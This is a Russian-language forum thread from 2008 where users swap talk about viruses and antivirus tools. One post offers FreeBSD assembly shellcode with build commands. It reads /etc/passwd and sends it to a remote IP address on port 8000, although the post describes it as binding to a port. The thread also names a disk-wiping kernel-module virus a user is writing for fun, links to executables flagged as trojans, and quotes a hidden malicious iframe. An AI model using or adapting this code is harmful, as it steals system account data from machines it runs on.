вирусы

Windows 95, 98, ME и 3,11; WinNT, Win2000, WinXP, Win2003, Vista, 7
Правила форума
Убедительная просьба юзать теги [cоde] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35454
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: вирусы

Непрочитанное сообщение Alex Keda » 2008-09-05 8:46:50

Да мне Энди давал.
Запускали - не работает =)
Убей их всех! Бог потом рассортирует...

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
zingel
beastie
Сообщения: 6204
Зарегистрирован: 2007-10-30 3:56:49
Откуда: Moscow
Контактная информация:

Re: вирусы

Непрочитанное сообщение zingel » 2008-09-06 19:52:38

надо кстати у него спросить есть там полиморфники и криптованые ELF у него
или токо в скриптах
не полиморфов не держу, а криптованные как и всё....самый понтовый вирь, который собирается как модуль ядра и потом тихонько срёт в сеть бродкастами, при попытке выгрузки трёт весь диск, но я его давно потерял, вот пытаюсь написать сам, ради прикола...
Z301171463546 - можно пожертвовать мне денег

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-09-10 15:09:41

http://clubs.ya.ru/4611686018427388619/ ... tem_no=198
Пятерка злостных «антивирусов» - программы-«обманщики»
нда... куда мир катится... :-o

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35454
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: вирусы

Непрочитанное сообщение Alex Keda » 2008-09-10 21:21:53

ф топку
Убей их всех! Бог потом рассортирует...

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-09-10 21:26:12

>zingel
самые прикольные
если у тебя они есть
это те которые врезаються в elf файлы прог
вот жесть))
а всяческие скрипты итд
это игрушки)

Аватара пользователя
zingel
beastie
Сообщения: 6204
Зарегистрирован: 2007-10-30 3:56:49
Откуда: Moscow
Контактная информация:

Re: вирусы

Непрочитанное сообщение zingel » 2008-09-11 4:42:27

ну, те что по эльфу размазываются - хорошо, однако у меня таких нет =(
Последний раз редактировалось zingel 2008-09-11 7:37:29, всего редактировалось 1 раз.
Z301171463546 - можно пожертвовать мне денег

Аватара пользователя
zingel
beastie
Сообщения: 6204
Зарегистрирован: 2007-10-30 3:56:49
Откуда: Moscow
Контактная информация:

Re: вирусы

Непрочитанное сообщение zingel » 2008-09-11 7:33:17

вот есть шелкодик, по-эльфу размазывается, от зеродей(zero day) размазывается и биндиться на 8000 порт, исключительно под фряху

Код: Выделить всё

_start:
xor eax, eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f  
mov ebx, esp
push eax
push ebx
mov al, 5       
push eax
int 0x80        
mov ebx, eax      
xor eax, eax     
xor ecx, ecx

mov cx, 3333     
push ecx
mov esi, esp     
push esi
push ebx
mov al, 3
push eax
int 0x80         

mov ebp, eax
xor eax, eax
mov al, 6
push ebx
push eax
int 0x80        

xor eax, eax
push eax
push byte 0x01
push byte 0x02
mov al, 97
push eax
int 0x80         

mov edx, eax     

push 0x2101a8c0   
push 0x401f02AA  
mov eax, esp

push byte 0x10
push eax
push edx
xor eax, eax
mov al, 98
push eax
int 0x80        

xor eax, eax
push ebp
push esi        
push edx
mov al, 4
push eax
int 0x80        

xor eax, eax
inc eax
push eax
push eax
int 0x80        
компилить

Код: Выделить всё

nasm -f elf shellcode.asm
ld -e _start -o shellcode shellcode.o
Z301171463546 - можно пожертвовать мне денег

Аватара пользователя
gloom
лейтенант
Сообщения: 738
Зарегистрирован: 2008-03-13 16:29:12
Откуда: UA

Re: вирусы

Непрочитанное сообщение gloom » 2008-10-11 22:04:32

Код: Выделить всё

Проверка: http://paradox.org.ua/work/dpbe.exe
Версия антивирусного ядра: 4.44.0.9170
Размер файла: 32.50 КБ

http://paradox.org.ua/work/dpbe.exe packed by UPX
>http://paradox.org.ua/work/dpbe.exe infected with Trojan.Spambot.3561

Код: Выделить всё

Проверка: http://paradox.org.ua/work/wuauclt.exe
Версия антивирусного ядра: 4.44.0.9170
Размер файла: 26.50 КБ

http://paradox.org.ua/work/wuauclt.exe infected with Win32.HLLW.Autoruner.2661

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-11 22:13:19

drweb ?

Аватара пользователя
gloom
лейтенант
Сообщения: 738
Зарегистрирован: 2008-03-13 16:29:12
Откуда: UA

Re: вирусы

Непрочитанное сообщение gloom » 2008-10-11 22:24:02

угу

Аватара пользователя
freeman
лейтенант
Сообщения: 734
Зарегистрирован: 2007-03-18 5:13:25

Re: вирусы

Непрочитанное сообщение freeman » 2008-10-13 11:15:48

Проверьте его на h__p://www.virustotal.com Очень интересно кто поймает/не поймает. :)
По поводу НОДа и т.д. По опыту 2х сетей (встречаюейся там заразы) Касперский больше всех ловит и при этом на чистые файлы (просто упакованные "опасным"пакером, уже вылеченые др. антивирем, но с частично оставшимися неопасным кодом, просто нормальные файлы) не фальшдетектит. А идеального (чтобы ловил 100%) не бывает. Это только в Вирус биллютене НОД как то таким "рисуется" :unknown:
Последний раз редактировалось freeman 2008-10-14 22:12:51, всего редактировалось 1 раз.
Остатся должен только один ...

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-14 20:21:51

freeman писал(а):Проверьте его на h__p://www.virustotal.com Очень интересно кто поймает/не поймает. :)
кого там ловить....?!!!!

Код: Выделить всё

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0.1">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>
подождал пока рефреш сработает :ROFL:

Код: Выделить всё

	<script type="text/javascript" src="/virustotalV2.js"></script>
	<script type="text/javascript" src="/autoidioma.js"></script>
правда скачать не дали... видимо рефер проверяют, но название скрипта уже обнадёживает )))

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-24 4:15:18

сижу и рыдаююю))))
обновил верисю баз нода 2.7
и всеравно вирус не видет
писеццццц

Аватара пользователя
freeman
лейтенант
Сообщения: 734
Зарегистрирован: 2007-03-18 5:13:25

Re: вирусы

Непрочитанное сообщение freeman » 2008-10-24 8:47:32

Блин да давно уже всем известно (имхо) что нод это дырка в антивирускной защите :)
Проверь свой вирус на h__p://www.virustotal.com и делай выводы.
Остатся должен только один ...

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-24 9:36:52

так у zg определяет
токоу него версия стреее моей))))рыдаю

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-24 20:50:10

таксь
zg а базы от твоей версии нока к моей подойдут?
они удаленно обновляються?
поделись аккаунтом))

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-27 6:40:26

paradox писал(а):таксь
zg а базы от твоей версии нока к моей подойдут?
они удаленно обновляються?
поделись аккаунтом))
у меня зеркало в локалке :unknown: могу только архив выложить. Вроде прога есть, которая апдейт подготавливает для нода. Могу поискать и выложить, если надо :smile:

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-27 15:39:15

нод виевер
у мну есть такая
токо смысл?))
у меня всеравно с теми базами не определяет
говорю же - последние обновил
вотдумаю может по разным пароль логинам с сайта раздают разные базы
надо будет поискать другие аккаунты

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-27 20:52:15

paradox писал(а):вотдумаю может по разным пароль логинам с сайта раздают разные базы
на счёт логинов не знаю, а то что серваки бывают разные и обновления на них разные, это да. При чём самое смешное было то, что чтобы обновиться надо было раз десять тыкнуть на кнопку обновиться. Раза с седьмого он успешно обновлялся с того же сервака, с которого десять минут назад :"": слил последние обновления. В чём был прикол, не знаю, но это было на самом деле. Я приходил на работу тупо тыкал обновляться пока он не сливал нормально базу. Но ни один вирь ко на комп не попадал, а на сосдених компах он спокойно пропускал почти все вири... :unknown: И наколько я помню сливал базы с офф. сайта просто потому, что моя версия нода не держала какую-то авторизацию... Правда потом всё равно прикрыли...

paradox
проходил мимо
Сообщения: 11620
Зарегистрирован: 2008-02-21 18:15:41

Re: вирусы

Непрочитанное сообщение paradox » 2008-10-27 21:07:01

пакуй и заливай свою базу от нода на фтп
надо разобраться
где это глюк
в базах
или версиях нода)

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-27 22:35:06


Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: вирусы

Непрочитанное сообщение schizoid » 2008-10-30 10:29:27

продолжу тему вирусы.
ща у клиента квип рассылает по списку контактов сцылку , по которой если зайти, то ловишь вирь. НОД32 и каспер не видят ниче. чем мона полечить?
ядерный взрыв...смертельно красиво...жаль, что не вечно...

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-30 13:53:12

кстати выложи ссылку, поиграимся :smile:

зайди на сайт квипа, думаю трабла такая не только у тебя

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: вирусы

Непрочитанное сообщение schizoid » 2008-10-30 18:08:00

сцылко воть
http://absoluts.org/img/live.gif
под фрей заходил, там картинко, вроде ниче криминального...но венда вешается говорят
ядерный взрыв...смертельно красиво...жаль, что не вечно...

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: вирусы

Непрочитанное сообщение zg » 2008-10-31 8:13:16

картинко говоришь? там такая хрень сидит

Код: Выделить всё

<img src="2410232.jpg">
<iframe src="http://linenetz.com/stats/ru1.php" style="display:none"></iframe>
:good:
а картинка вполне безобидная
2410232.jpg
Короче говоря там куча редиректов в итоге пришёл на

Код: Выделить всё

http://mydom3.ru/
вирусов не нашёл, но вполне вероятно, что браузер нацепляет кучу всякой заразы :smile: